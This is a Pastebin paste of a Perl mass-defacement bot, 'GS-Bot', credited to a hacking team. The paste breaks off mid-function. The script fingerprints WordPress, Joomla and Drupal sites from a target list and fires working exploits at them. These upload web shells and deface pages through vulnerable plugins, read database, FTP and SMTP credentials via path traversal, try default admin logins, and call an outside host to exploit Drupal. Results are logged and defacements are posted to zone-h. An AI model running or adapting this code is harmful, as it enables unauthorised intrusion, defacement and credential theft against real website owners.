API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Sep 5th, 2016
673
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 62.16 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. #First Big Deface Proget GS-Bot 2015 © Coded By | Fallag Gassrini | Tunisian Fallaga Team |
  3. #The Code 4 Palestine The Love 4 Palestine and Life 4 For Palestine
  4. #Hello Hater'z :* on This script you wil find :
  5. #Auto cms detect
  6. #[DRUPAL]
  7. #[COM_ADS MANAGER] upload shell + index
  8. #[COM_USER SCANNER]
  9. #[COM_JCE] upload deface pic
  10. #[COM_MEDIA] upload shell + index
  11. #[COM_BLOG SCANNER]
  12. #[COM_JDOWNLOADS] upload shell + index
  13. #[COM_HDFLVPLAYER] download config
  14. #[COM_FABRIC] upload shell + index
  15. #wordpress
  16. #[WYSIJA] upload shell + index
  17. #[GRAVITY FORMS] upload shell + index
  18. #[REVSLIDER ] upload shell + index
  19. #[REVSLIDER GETCONFIG] Get config and try to login with password on panel admin
  20. #[PMA SCANER]
  21. #[REVSLIDER GET CPANEL]
  22. #[REVSLIDER AJAX DEFACE]
  23. # auto post on zone-h & mirror zone ///////////////// here want to say they update da mirror zone with a fucking captcha :/ so i will update it on 2016 inshallah in the V2 of this Bot :)
  24. # tmp folder Will content The scaned websites
  25. # All Result Will be Placed on Result Folder
  26. #Don't Change da Damn Fucking Right Madafaking Bitch Lamerz
  27. #Changing da Fucking Right Won't Make You da facking Real Coder Madafaka
  28. #If You want You can use da script but you dont need to play it da fucking smart Coder
  29. # Don't Use It Against Tunisian And Muslims Websites :)
  30. #Thanks to :Tounsi TNT
  31. #Greetz All Fallaga Team members all Muslims Every where
  32. # Fallag Gassrini Page :> https://www.facebook.com/gassrini.gov.tn/
  33.  
  34.  
  35. use HTTP::Request;
  36. use LWP::UserAgent;
  37. use IO::Select;
  38. use HTTP::Response;
  39. use Term::ANSIColor;
  40. use HTTP::Request::Common qw(POST);
  41. use HTTP::Request::Common qw(GET);
  42. use URI::URL;
  43. use IO::Socket::INET;
  44. my $datetime = localtime;
  45. $tmp="tmp";
  46. if (-e $tmp)
  47. {
  48. }
  49. else
  50. {
  51. mkdir $tmp or die "Error creating directory: $tmp";
  52. }
  53.  
  54. $rez="Result";
  55. if (-e $rez)
  56. {
  57. }
  58. else
  59. {
  60. mkdir $rez or die "Error creating directory: $rez";
  61. }
  62.  
  63. $logo="
  64. ':llcodddddoodddddddddolll;.
  65. 'cldxdx0NMXd,. .';cox0WWXOxddoll'
  66. 'lodd0WMMNd;..,clc:::::;,,,;cddxOXMWOoood;
  67. 'oddkNMMMKo' .:l:.. 'OMMMKdddo. .
  68. ;xdxXMMMMMl .:lc. cMMMMMKddd' ....'
  69. ,OdxWMMMMMMx;oc. cMMMMMMMNodx. ........'
  70. .xxdNMWK0KMMNd' ';;;;,,'. ...'',;dN0KXNNWWN0:k;...'''........,
  71. '0oKMMX;.;;dW,': .:dkOxlcccclloddollc;,..;'...''''''lddxdc''........,
  72. ;0oNMMW; lMXo 'cloc'. .;coc.......;kd0NXWW0,'.......,
  73. :0oWMMW; ON0.. xWk,. ..',:ccc;. ,.......dlxWKcoNWo'''.....'
  74. 'KoWMMMx ,WXx:'O:...',clccloxkO0XNWx,.. :.......;kokXXXN0;''''''.'.
  75. .KoNMMMK. kk. oo. dk0WMMMMMM0c. odc;'....'lddxxl,'''''..
  76. okkWWWO. oWk..k, c:l: .OMMMMo' cOc. ;MMMMWXKOkkxxxkcd:
  77. .XlNx. .OWWWKdKo.. .xO0Oxo. KMMMWWMMMMM0;;::;:kMMMMMMMMMMMMMMXl0
  78. cKdMN, .dxxKWWN:,clc''OMMMMMMNkWW0xooooxd;'... kMMMMMMMMMMMMMMMcX.
  79. dkkK' ..:. xMWN. ,0WMMMMNOo,. .',dkoxMMMMMMMMMMMMMMMoK;
  80. xk, ON; .lWWWX'. .x0l,. ;oc' xckMMMMMMMMMMMMMo0:
  81. dk. .OMMW0NMMXxl:;;;:ok. :o; .k: :MMMMMMMMMMMMMoK;
  82. :K. .oWMMMMMMWd''''''''',;;' 'cll. .lo. ;MMMMMMMMMMMMMcX.
  83. .X;cOWMMMMMMMX:''''''''''''',;::::clollc:' .;lo:. lMMN0WMMMMMMMXlO
  84. dkOMMMMW00xd,''''',oocc'''''',l:;'......';;:;. 0Nc :NMMMMMo0,
  85. .KlNMMMXxKd';oxxdkN: ;'''''''''',,,;cclc. oc OMMMMKlk
  86. ,KoWMMMW0O0Ol,. ld :X0;'''''''''''''''';' ..;ld: .kcdXXc0.
  87. c0dWMMWO: co :XMMMWx'''''''''''''''':x::xWXl cd. .0.
  88. :0d0l. x:'dNMMMMMMMK:''''''''''''''',xKd' .0: .0'
  89. ;0,. kc0MMMMMMMMMMMMXxl;''''''''''''l. .o. ;k.
  90. .kd. .NWMMMMMMMMMMMMMMMMMNl.,'''''''': .l: .xl
  91. ,k:. kMMMMMMMMMMMMMMMMMN; ''''''''': ;d. lk.
  92. ;d:. .NMMMMMMMMMMMMMMWx. ,'''''''': o, .lx,
  93. .oo,cKMMMMMMMMMMMMK' ,.''''',; c. ,oo'
  94. :ooclkXMMMMMMWd .,'''';,. .,od;
  95. ;lcc::cdOk, ;'.... .,ccc,
  96. .:cc::;'.. ..';cc::;.
  97. 'cx00kxO00KX0xc,.
  98. ";
  99.  
  100. print $logo;
  101. print "\t";
  102. print colored ("[ Code 4 Palestine |",'white on_black');
  103. print colored (" Love 4 Palestine |",'white on_green');
  104. print colored ("Life 4 Palestine ]",'white on_red'),"\n";
  105. print colored("[ GS-Bot Bazooka |Coded By Fallag Gassrini | Tunisian Fallaga Team ]",'white on_blue'),"\n\n\n";
  106. print colored ("Start At $datetime",'white on_red'),"\n\n";
  107.  
  108. open(tarrget,"<$ARGV[0]") or die "Fuck you where is Website list -_- mafaka \n";
  109. while(<tarrget>){
  110. chomp($_);
  111. $site = $_;
  112. if($site !~ /http:\/\//) { $site = "http://$site/"; };
  113. efrez();
  114. }
  115. sub efrez($site){
  116. $ua = LWP::UserAgent->new(keep_alive => 1);
  117. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  118. $ua->timeout (10);
  119.  
  120. my $efreez = $ua->get("$site")->content;
  121. if($efreez =~/wp-content\/themes\/|wp-content\/plugins\/|wordpress/) {
  122. print colored("[WORDPRESS] $site",'white on_magenta'),"\n\n\n";
  123. open(save, '>>tmp/wordpress.txt');
  124. print save "$site\n";
  125. close(save);
  126. wysija();
  127. gravity();
  128. revshell();
  129. }
  130.  
  131. elsif($efreez =~/<script type=\"text\/javascript\" src=\"\/media\/system\/js\/mootools.js\"><\/script>|Joomla!|Joomla|joomla/) {
  132. print colored("[JOOMLA] $site",'white on_magenta'),"\n\n\n";
  133. open(save, '>>tmp/joomla.txt');
  134. print save "$site\n";
  135. close(save);
  136. comadsmanegr();
  137. comusers();
  138. comjce();
  139. comediashell();
  140. comediaindex();
  141. comblog();
  142. comjdowloads();
  143. hdflvplayer();
  144. comfabr();
  145. indecomfabr();
  146. }
  147.  
  148. elsif($efreez =~/\/modules\/system\/system.menus.css|\/sites\/default\/files\/|<meta name=\"Generator\" content=\"Drupal 7/) {
  149. print colored("[DRUPAL] $site",'white on_magenta'),"\n\n\n";
  150. fuckdrupal();
  151.  
  152. open(save, '>>tmp/Drupal.txt');
  153. print save "$site\n";
  154. close(save);
  155. }else{
  156. print "\n[UNKNOWN] $site\n";
  157. }
  158. }
  159.  
  160.  
  161. ####################################################################################################################
  162. ####################################################################################################################
  163. ######################################### DRUPAL ##################################################################
  164. ####################################################################################################################
  165. sub fuckdrupal(){
  166.  
  167. $ua = LWP::UserAgent->new(keep_alive => 1);
  168. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  169. $ua->timeout (20);
  170.  
  171. # check the link of the exploit or you can download script from here : http://pastebin.com/wPAbtyJ4 and you upload it on you one shell :)
  172. $drupalink = "http://mltproductions.nl/gb.php";
  173. my $exploit = "$drupalink?url=$site&submit=submit";
  174. my $checkk = $ua->get("$exploit")->content;
  175. if($checkk =~/Success!/) {
  176. print colored ("[DRUPAL EXPLOIT]",'white on_red');
  177. print " ............... ";
  178. print color('bold white');
  179. print "[";
  180. print color('reset');
  181. print color('bold green');
  182. print "VULN";
  183. print color('reset');
  184. print color('bold white');
  185. print "] \n";
  186. print color('reset');
  187.  
  188. print "[WAIT I WILL MAKE SURE ABOUT USER AND PASSWORD]\n";
  189. # // here to test the user name and the password if the website has been really fucked or not :p
  190. $admin ="gassrini";
  191. $pass ="admin";
  192. $wp = $site . '/user/login';
  193. $red = $site . '/user/1';
  194. print "$wp\n";
  195.  
  196. $brute = POST $wp, [name => $admin, pass => $pass, form_build_id =>'', form_id => 'user_login',op => 'Log in', location => $red];
  197. $response = $ua->request($brute);
  198. $stat = $response->status_line;
  199. if ($stat =~ /302/){
  200. print colored ("[BOOM] $site => User | $admin Password | $pass",'white on_yellow'),"\n";
  201. open(save, '>>Result/Drupal.txt');
  202. print save "Success Gass ! $site | username : gassrini | pass: admin\n";
  203. close(save);
  204. }
  205. elsif ($stat =~ /404/){
  206. print "[NOT DRUPAL] .................. [ERROR]\n";
  207. }
  208. }else{
  209. # // here to test user: admin and password : admin on the panel admin
  210. print "[TRYING WITH USER AND PASSWORD ADMIN]\n";
  211. $admin="admin";
  212. $pass ="admin";
  213. $dr = $site . '/user/login';
  214. $brute = POST $dr, [name => $admin, pass => $pass, form_build_id =>'', form_id => 'user_login',op => 'Log in'];
  215. $response = $ua->request($brute);
  216. $stat = $response->status_line;
  217. if ($stat =~ /302/){
  218.  
  219. print colored ("[BOOM] $site=> User | $admin Password | $pass",'white on_yellow'),"\n";
  220.  
  221. open(save, '>>Result/Drupal.txt');
  222.  
  223. print save "Success Gass ! $site | username : $admin | pass: $pass\n";
  224.  
  225. close(save);
  226. }else{
  227. print "[DRUPAL] ...................... ";
  228. print color('bold white');
  229. print "[";
  230. print color('reset');
  231. print color('bold red');
  232. print "ERROR";
  233. print color('reset');
  234. print color('bold white');
  235. print "] \n";
  236. print color('reset');
  237.  
  238. }
  239.  
  240. }
  241. }
  242.  
  243.  
  244.  
  245. ####################################################################################################
  246. ####################################################################################################
  247. ###################################### JCE ###################################################
  248. ####################################################################################################
  249. ####################################################################################################
  250. sub comjce($site){
  251. print colored ("[COM JCE]",'white on_red');
  252. $ua = LWP::UserAgent->new();
  253. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  254. $ua->timeout(15);
  255.  
  256.  
  257. $exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20";
  258.  
  259. $vulnurl=$site.$exploiturl;
  260. $res = $ua->get($vulnurl)->content;
  261. if ($res =~ m/No function call specified!/i){
  262. open(save, '>>Result/vulntargets.txt');
  263. print save "[JCE] $site\n";
  264. close(save);
  265.  
  266. print " .................. ";
  267. print color('bold white');
  268. print "[";
  269. print color('reset');
  270. print color('bold green');
  271. print "VULN JCE";
  272. print color('reset');
  273. print color('bold white');
  274. print "] ";
  275. print color('reset');
  276. print "\n[UPLOADING PICTURE]";
  277. my $res = $ua->post($vulnurl,
  278. Content_Type => 'form-data',
  279. Content => [
  280. 'upload-dir' => './../../',
  281. 'upload-overwrite' => 0,
  282. 'Filedata' => ["gass.gif"],
  283. 'action' => 'upload'
  284. ]
  285. )->decoded_content;
  286. if ($res =~ m/"error":false/i){
  287.  
  288. }else{
  289. print " ......... ";
  290. print color('bold white');
  291. print "[";
  292. print color('reset');
  293. print color('bold green');
  294. print "PATCHED";
  295. print color('reset');
  296. print color('bold white');
  297. print "] \n";
  298. print color('reset');
  299. }
  300.  
  301. $remote = IO::Socket::INET->new(
  302. Proto=>'tcp',
  303. PeerAddr=>"$site",
  304. PeerPort=>80,
  305. Timeout=>15
  306. );
  307. $def= "$site/gass.gif";
  308. $check = $ua->get($def)->status_line;
  309. if ($check =~ /200/){
  310. print " ......... ";
  311. print color('bold white');
  312. print "[";
  313. print color('reset');
  314. print color('bold green');
  315. print "DEFACED";
  316. print color('reset');
  317. print color('bold white');
  318. print "] \n";
  319. print color('reset');
  320. print "[LINK] => $def\n";
  321. zoneh();
  322. mirrorzon();
  323. }
  324. }else{print " .................. ";
  325. print color('bold white');
  326. print "[";
  327. print color('reset');
  328. print color('bold red');
  329. print "NOT VULN";
  330. print color('reset');
  331. print color('bold white');
  332. print "] \n";
  333. print color('reset');
  334. }
  335.  
  336. }
  337. ####################################################################################################
  338. ####################################################################################################
  339. ################################# COM MEDIA ######################################################
  340. ####################################################################################################
  341. ####################################################################################################
  342. sub comediashell($site){
  343. print "\n";
  344. print colored ("[COM MEDIA]",'white on_red');
  345. $tarmedia="$site/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=";
  346. $shlez = "gass.PhP.txt";
  347. $shlz="$site/images/gass.PhP.txt";
  348. $index="$site/gass.html";
  349. $ua = LWP::UserAgent->new;
  350. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
  351. $sorm = $ua->get($tarmedia);
  352. $karza = $sorm->content;
  353. if($karza =~/<form action="(.*?)" id=\"uploadForm\" class=\"form-horizontal\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ || $karza =~ /<form action="(.*?)" id=\"uploadForm\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ )
  354. {
  355. $url = $1;
  356. $url =~ s/&amp;/&/gi;
  357. print " .................... [VULN]\n[UPLOADING SHELL]";
  358. open(save, '>>Result/vulntargets.txt');
  359. print save "[Media] $site\n";
  360. close(save);
  361. my $res = $ua->post($url, Content_Type => 'form-data', Content => [ Filedata => [$shlez] ]);
  362. $check = $ua->get($shlz);
  363. if($check->content =~/gassrini/ || $check->is_success ) {
  364. print" ........... ";
  365. print color('bold white');
  366. print "[";
  367. print color('reset');
  368. print color('bold green');
  369. print "SUCCESS";
  370. print color('reset');
  371. print color('bold white');
  372. print "] \n";
  373. print color('reset');
  374. print colored ("[SHELL LINK] => $shlz",'white on_yellow'),"\n";
  375. open (TEXT, '>>Result/shells.txt');
  376. print TEXT "\n[ COM MEDIA SHELL] =>$shlz \n";
  377. close (TEXT);
  378. my $checkndex = $ua->get("$index")->content;
  379. if($checkndex=~/Hacked/){
  380. $def="$index";
  381.  
  382. print colored ("[INDEX LINK] => $def",'white on_yellow'),"\n";
  383. zoneh();
  384. mirrorzon()
  385. }
  386.  
  387. }
  388. }else{print " ................ ";
  389. print color('bold white');
  390. print "[";
  391. print color('reset');
  392. print color('bold red');
  393. print "NOT VULN";
  394. print color('reset');
  395. print color('bold white');
  396. print "] \n";
  397. print color('reset');
  398. }
  399. }
  400. ########################################## INDEX ###################################################
  401. sub comediaindex(){
  402. $shlez = "gass.txt";
  403. $shlz="$site/images/gass.txt";
  404. #$index="$site/gass.html";
  405. $ua = LWP::UserAgent->new;
  406. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
  407. $sorm = $ua->get($tarmedia);
  408. $karza = $sorm->content;
  409. if($karza =~/<form action="(.*?)" id=\"uploadForm\" class=\"form-horizontal\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ || $karza =~ /<form action="(.*?)" id=\"uploadForm\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ )
  410. {
  411. $url = $1;
  412. $url =~ s/&amp;/&/gi;
  413. print "\n[UPLOADING INDEX]";
  414. my $res = $ua->post($url, Content_Type => 'form-data', Content => [ Filedata => [$shlez] ]);
  415. $check = $ua->get($shlz);
  416. if($check->content =~/Hacked/ || $check->is_success ) {
  417. print " ........... ";
  418. print color('bold white');
  419. print "[";
  420. print color('reset');
  421. print color('bold green');
  422. print "DEFACED";
  423. print color('reset');
  424. print color('bold white');
  425. print "] \n";
  426. print color('reset');
  427.  
  428. print colored ("[INDEX LINK] => $shlz",'white on_yellow'),"\n";
  429. $def="$shlz";
  430. zoneh();
  431. mirrorzon()
  432. }
  433.  
  434. }
  435. }
  436. ####################################################################################################
  437. ####################################################################################################
  438. #########################################jdownloads ###############################################
  439. ####################################################################################################
  440. ####################################################################################################
  441.  
  442. sub comjdowloads($site){
  443. print colored ("[COM JDOWNLOADS]",'white on_red');
  444. $file="gassrini.rar";
  445. $filez="gassrini.php.php.j";
  446. $jdup= $site . 'index.php?option=com_jdownloads&Itemid=0&view=upload';
  447. $shellpath= $site . '/images/jdownloads/screenshots/gassrini.php.j';
  448.  
  449. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  450. $ua->timeout(10);
  451. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  452.  
  453. my $exploit = $ua->post("$jdup", Cookie => "", Content_Type => "form-data", Content => [ name=>"Fallag Gassrini", mail=>"fallagassrini@gmail.com", filetitle =>"Fallaga Team", catlist=>"1", license=>"0", language=>"0", system=>"0",file_upload=>["$file"], pic_upload=>["$filez"], description=>"<p>zot</p>", senden=>"Send file", option=>"com_jdownloads", view=>"upload", send=>"1", "24c22896d6fe6977b731543b3e44c22f"=>"1"]);
  454.  
  455. if ($exploit->decoded_content =~ /The file was successfully transferred to the server/) {
  456. print " ............... ";
  457. print color('bold white');
  458. print "[";
  459. print color('reset');
  460. print color('bold green');
  461. print "VULN";
  462. print color('reset');
  463. print color('bold white');
  464. print "] \n";
  465. print color('reset');
  466. open(save, '>>Result/vulntargets.txt');
  467. print save "[jdown] $site\n";
  468. close(save);
  469.  
  470. print "[SCANING SHELL] ................ ";
  471. print color('bold white');
  472. print "[";
  473. print color('reset');
  474. print color('bold blue');
  475. print "WAIT";
  476. print color('reset');
  477. print color('bold white');
  478. print "] \n";
  479. print color('reset');
  480.  
  481. my $checkshell = $ua->get("$shellpath")->content;
  482. if($checkshell =~/Fallagassrini/) {
  483. print colored ("[SHELL LINK] => $shellpath",'white on_green'),"\n";
  484. open (TEXT, '>>Result/shells.txt');
  485. print TEXT "[ JDWN SHELL] => $shellpath\n";
  486. close (TEXT);
  487. }else{
  488. ##################################################################
  489. print "[ERROR] ................... ";
  490. print color('bold white');
  491. print "[";
  492. print color('reset');
  493. print color('bold red');
  494. print "SHELL 404";
  495. print color('reset');
  496. print color('bold white');
  497. print "] \n";
  498. print color('reset');
  499.  
  500. }
  501.  
  502. # // if shell not uploaded this will upload a gif index //
  503.  
  504. print "[JDOWNLOAD INDEX]";
  505.  
  506. $def = $site . '/images/jdownloads/screenshots/gass.html.j';
  507. $filee="gass.rar";
  508. $filezz="gass.html.j";
  509. my $exploitx = $ua->post("$jdup", Cookie => "", Content_Type => "form-data", Content => [ name=>"Fallag Gassrini", mail=>"fallagassrini@gmail.com", filetitle =>"Fallaga Team", catlist=>"1", license=>"0", language=>"0", system=>"0",file_upload=>["$filee"], pic_upload=>["$filezz"], description=>"<p>zot</p>", senden=>"Send file", option=>"com_jdownloads", view=>"upload", send=>"1", "24c22896d6fe6977b731543b3e44c22f"=>"1"]);
  510. if ($exploit->decoded_content =~ /The file was successfully transferred to the server/) {
  511. print " ................ ";
  512. print color('bold white');
  513. print "[";
  514. print color('reset');
  515. print color('bold green');
  516. print "OK";
  517. print color('reset');
  518. print color('bold white');
  519. print "] \n";
  520. print color('reset');
  521. print "[SCANING INDEX] ................";
  522. print color('bold white');
  523. print "[";
  524. print color('reset');
  525. print color('bold blue');
  526. print "WAIT";
  527. print color('reset');
  528. print color('bold white');
  529. print "] \n";
  530. print color('reset');
  531.  
  532.  
  533. my $response = $ua->get("$def")->status_line;
  534. if ($response =~ /200/){
  535. print "[DEFACE] .....................";
  536. print color('bold white');
  537. print "[";
  538. print color('reset');
  539. print color('bold green');
  540. print "SUCCESS";
  541. print color('reset');
  542. print color('bold white');
  543. print "] \n";
  544. print color('reset');
  545.  
  546. print colored ("[INDEX LINK] => $def",'white on_green'),"\n";
  547. zoneh();
  548. mirrorzon();
  549. }else{
  550. print "[DEFACE] .......................";
  551. print color('bold white');
  552. print "[";
  553. print color('reset');
  554. print color('bold red');
  555. print "ERROR";
  556. print color('reset');
  557. print color('bold white');
  558. print "] \n";
  559. print color('reset');
  560.  
  561. }
  562. }
  563. }else{ print " ........... ";
  564. print color('bold white');
  565. print "[";
  566. print color('reset');
  567. print color('bold red');
  568. print "NOT VULN";
  569. print color('reset');
  570. print color('bold white');
  571. print "] \n";
  572. print color('reset');
  573.  
  574. }
  575.  
  576. }
  577.  
  578.  
  579. ####################################################################################################
  580. ####################################################################################################
  581. ######################################COM hdflvplayer##############################################
  582. ####################################################################################################
  583. ####################################################################################################
  584. sub hdflvplayer($site){
  585.  
  586. # // here for download config but i have to add download cpanel information :p //
  587.  
  588. print colored ("[HDFLVPLAYER]",'white on_red');
  589. $conflink = "$site/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php";
  590. $ua = LWP::UserAgent->new(keep_alive => 1);
  591. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  592. $ua->timeout (10);
  593. $resp = $ua->request(HTTP::Request->new(GET => $conflink));
  594. $cont = $resp->content;
  595. if($cont =~ m/class JConfig|mosConfig_offline_message/g){
  596. print " .................. ",
  597. print color('bold white');
  598. print "[";
  599. print color('reset');
  600. print color('bold green');
  601. print "VULN";
  602. print color('reset');
  603. print color('bold white');
  604. print "] \n";
  605. print color('reset');
  606. open(save, '>>Result/vulntargets.txt');
  607. print save "[hdflv] $site\n";
  608. close(save);
  609.  
  610.  
  611.  
  612.  
  613. open (TEXT, '>>Result/databases.txt');
  614. print TEXT "$site\n[+]DATABASE INFO\n";
  615. close (TEXT);
  616. print color("white"),"\t[+]DATABASE INFO\n";
  617. if ($cont =~ /user = \'(.*?)\';/){
  618. print color("red"),"\t[-]Database User = $1 \n";
  619. print color 'reset';
  620. open (TEXT, '>>Result/databases.txt');
  621. print TEXT "[-]Database User = $1 \n";
  622. close (TEXT);
  623. }
  624. if ($cont =~ /password = \'(.*?)\';/){
  625. print color("red"),"\t[-]Database Password = $1 \n";
  626. print color 'reset';
  627. open (TEXT, '>>Result/databases.txt');
  628. print TEXT "[-]Database Password = $1\n";
  629. close (TEXT);
  630. }
  631. if ($cont =~ /db = \'(.*?)\';/){
  632. print color("red"),"\t[-]Database Name = $1 \n";
  633. print color 'reset';
  634. open (TEXT, '>>Result/databases.txt');
  635. print TEXT "[-]Database Name = $1\n";
  636. close (TEXT);
  637. }
  638. if ($cont =~ /host = \'(.*?)\';/){
  639. print color("red"),"\t[-]Database Host = $1 \n";
  640. print color 'reset';
  641. open (TEXT, '>>Result/databases.txt');
  642. print TEXT "[-]Database Host = $1\n";
  643. close (TEXT);
  644. }
  645.  
  646.  
  647. print color("white"),"\t[+] FTP INFO\n";
  648. if ($cont =~ /ftp_host = \'(.*?)\';/){
  649. print color("red"),"\t[-]FTP Host = $1 \n";
  650. print color 'reset';
  651. open (TEXT, '>>Result/databases.txt');
  652. print TEXT "\n[+] FTP INFO\n[-]FTP Host = $1\n";
  653. close (TEXT);
  654. }
  655. if ($cont =~ /ftp_port = \'(.*?)\';/){
  656. print color("red"),"\t[-]FTP Port = $1 \n";
  657. print color 'reset';
  658. open (TEXT, '>>Result/databases.txt');
  659. print TEXT "[-]FTP Port = $1\n";
  660. close (TEXT);
  661. }
  662. if ($cont =~ /ftp_user = \'(.*?)\';/){
  663. print color("red"),"\t[-]FTP User = $1 \n";
  664. print color 'reset';
  665. open (TEXT, '>>Result/databases.txt');
  666. print TEXT "[-]FTP User = $1\n";
  667. close (TEXT);
  668. }
  669. if ($cont =~ /ftp_pass = \'(.*?)\';/){
  670. print color("red"),"\t[-]FTP Pass = $1 \n";
  671. print color 'reset';
  672. open (TEXT, '>>Result/databases.txt');
  673. print TEXT "[-]FTP Pass = $1\n\n";
  674. close (TEXT);
  675. }
  676.  
  677.  
  678.  
  679. print color("white"),"\t[+] SMTP INFO\n";
  680. if ($cont =~ /smtpuser = \'(.*?)\';/){
  681. print color("red"),"\t[-]SMTP User = $1 \n";
  682. print color 'reset';
  683. open (TEXT, '>>Result/databases.txt');
  684. print TEXT "[+] SMTP INFO\n[-]SMTP User = $1\n";
  685. close (TEXT);
  686. }
  687. if ($cont =~ /smtppass = \'(.*?)\';/){
  688. print color("red"),"\t[-]SMTP Password = $1 \n";
  689. print color 'reset';
  690. open (TEXT, '>>Result/databases.txt');
  691. print TEXT "[-]SMTP Password = $1\n";
  692. close (TEXT);
  693. }
  694. if ($cont =~ /smtpport = \'(.*?)\';/){
  695. print color("red"),"\t[-]SMTP Port = $1 \n";
  696. print color 'reset';
  697. open (TEXT, '>>Result/databases.txt');
  698. print TEXT "[-]SMTP Port = $1\n";
  699. close (TEXT);
  700. }
  701. if ($cont =~ /smtphost = \'(.*?)\';/){
  702. print color("red"),"\t[-]SMTP Host = $1 \n\n";
  703. print color 'reset';
  704. open (TEXT, '>>Result/databases.txt');
  705. print TEXT "[-]SMTP Host = $1\n";
  706. close (TEXT);
  707.  
  708. }
  709.  
  710. }else{print " .............. ";
  711. print color('bold white');
  712. print "[";
  713. print color('reset');
  714. print color('bold red');
  715. print "NOT VULN";
  716. print color('reset');
  717. print color('bold white');
  718. print "] \n";
  719. print color('reset');
  720.  
  721. }
  722.  
  723. }
  724.  
  725. ####################################################################################################
  726. ####################################################################################################
  727. ####################################################################################################
  728. ####################################################################################################
  729. ####################################################################################################
  730.  
  731. sub comfabr(){
  732. print colored ("[COM FABRIC]",'white on_red');
  733. $comfab= $site . '/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1';
  734. $def = $site . '/media/gass.txt';
  735. $fabshell = $site . '/media/gass.PhP.txt';
  736. ##
  737. $indfile="gass.txt";
  738. $shelfile="gass.PhP.txt";
  739. ##
  740. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  741. $ua->timeout(10);
  742. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  743. my $indfab = $ua->post("$comfab", Cookie => "", Content_Type => "form-data", Content => ["userfile" => ["$shelfile"], "name" => "me.php", "drop_data" => "1", "overwrite" => "1", "field_delimiter" => ",", "text_delimiter" => "&quot;", "option" => "com_fabrik", "controller" => "import", "view" => "import", "task" => "doimport", "Itemid" => "0", "tableid" => "0"]);
  744. my $checkfab = $ua->get("$fabshell")->content;
  745. if($checkfab =~/Fallagassrini/) {
  746. print " ................... ";
  747.  
  748. print color('bold white');
  749. print "[";
  750. print color('reset');
  751. print color('bold green');
  752. print "VULN";
  753. print color('reset');
  754. print color('bold white');
  755. print "] \n";
  756. print color('reset');
  757. open(save, '>>Result/vulntargets.txt');
  758. print save "[fabric] $site\n";
  759. close(save);
  760.  
  761. print "[SHELL LINK] => $fabshell\n";
  762. open (TEXT, '>>Result/shells.txt');
  763. print TEXT "[COM FABRIC] =>$fabshell \n";
  764. close (TEXT);
  765. }else{
  766. print " ............... ";
  767. print color('bold white');
  768. print "[";
  769. print color('reset');
  770. print color('bold red');
  771. print "NOT VULN";
  772. print color('reset');
  773. print color('bold white');
  774. print "] \n";
  775. print color('reset');
  776.  
  777. }
  778. }
  779. ############################################# INDEX ################################################
  780.  
  781. sub indecomfabr(){
  782. print "[UPLOAD INDEX COM FABRIC] .......";
  783. print color('bold white');
  784. print "[";
  785. print color('reset');
  786. print color('bold blue');
  787. print "WAIT";
  788. print color('reset');
  789. print color('bold white');
  790. print "] \n";
  791. print color('reset');
  792. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  793. $ua->timeout(10);
  794. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  795. my $indfab = $ua->post("$comfab", Cookie => "", Content_Type => "form-data", Content => ["userfile" => ["$indfile"], "name" => "me.php", "drop_data" => "1", "overwrite" => "1", "field_delimiter" => ",", "text_delimiter" => "&quot;", "option" => "com_fabrik", "controller" => "import", "view" => "import", "task" => "doimport", "Itemid" => "0", "tableid" => "0"]);
  796. my $checkfab = $ua->get("$def")->content;
  797. if($checkfab =~/Hacked/) {
  798. open(save, '>>Result/vulntargets.txt');
  799. print save "[fabric] $site\n";
  800. close(save);
  801.  
  802. print "[DEFACE] .................... ";
  803. print color('bold white');
  804. print "[";
  805. print color('reset');
  806. print color('bold green');
  807. print "SUCCESS";
  808. print color('reset');
  809. print color('bold white');
  810. print "] \n";
  811. print color('reset');
  812.  
  813. print "[INDEX LINK] => $def\n";
  814. zoneh();
  815. mirrorzon();
  816. }else{
  817. print "[DEFACE] ...................... ";
  818. print color('bold white');
  819. print "[";
  820. print color('reset');
  821. print color('bold red');
  822. print "ERROR";
  823. print color('reset');
  824. print color('bold white');
  825. print "] \n";
  826. print color('reset');
  827.  
  828. }
  829. }
  830.  
  831. ####################################################################################################
  832. ####################################################################################################
  833. ####################################### COM USERS #############################################
  834. ####################################################################################################
  835. ####################################################################################################
  836.  
  837. sub comusers(){
  838. print colored ("[COM USER SCANNER]",'white on_red');
  839. $ua = LWP::UserAgent->new(keep_alive => 1);
  840. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
